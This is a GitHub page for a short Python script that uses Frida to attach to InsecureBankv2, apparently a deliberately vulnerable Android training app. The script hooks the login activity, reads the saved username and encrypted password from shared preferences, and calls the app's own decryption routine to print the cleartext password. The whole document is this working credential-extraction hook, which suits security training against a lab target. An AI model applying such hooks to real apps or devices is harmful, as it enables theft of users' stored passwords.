Frida-on-InsecureBankv2/credentials_log.py at master · Kaaal-El/Frida-on-InsecureBankv2 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import frida, sys

def on_message(message, data):
	if message['type'] == 'send':
		print("[*] {0}".format(message['payload']))
	else:
		print(message)

code = """
Java.perform(function () {
	var main = Java.use('com.android.insecurebankv2.LoginActivity');
	var crycls = Java.use('com.android.insecurebankv2.CryptoClass');
	var b64 = Java.use('android.util.Base64');
	var str = Java.use('java.lang.String');

	main.fillData.implementation = function () {
	send('Function fillData called');
	var spvar = this.getSharedPreferences("mySharedPreferences", 0);

	//Get Username which will be in base64
	send("Username Encoded: ");
	console.log(spvar.getString("EncryptedUsername", null));

	//Decode the Username
	send("Username Decoded: ");
	var b64var = b64.$new();
	var dstr = str.$new(b64var.decode('ZGluZXNo', 0));
	console.log(dstr);

	//Get the Password which will be Encrypted
	console.log(" \\nPassword Encrypted :");
	console.log(spvar.getString("superSecurePassword", null));

	//Decrypt the Password
	console.log("Password Decrypted:");
	var cryclsvar = crycls.$new();
	console.log(cryclsvar.aesDeccryptedString(spvar.getString("superSecurePassword", null)));
	};


});
"""

process = frida.get_usb_device().attach('com.android.insecurebankv2')
script = process.create_script(code)
script.on('message', on_message)
script.load()
sys.stdin.read()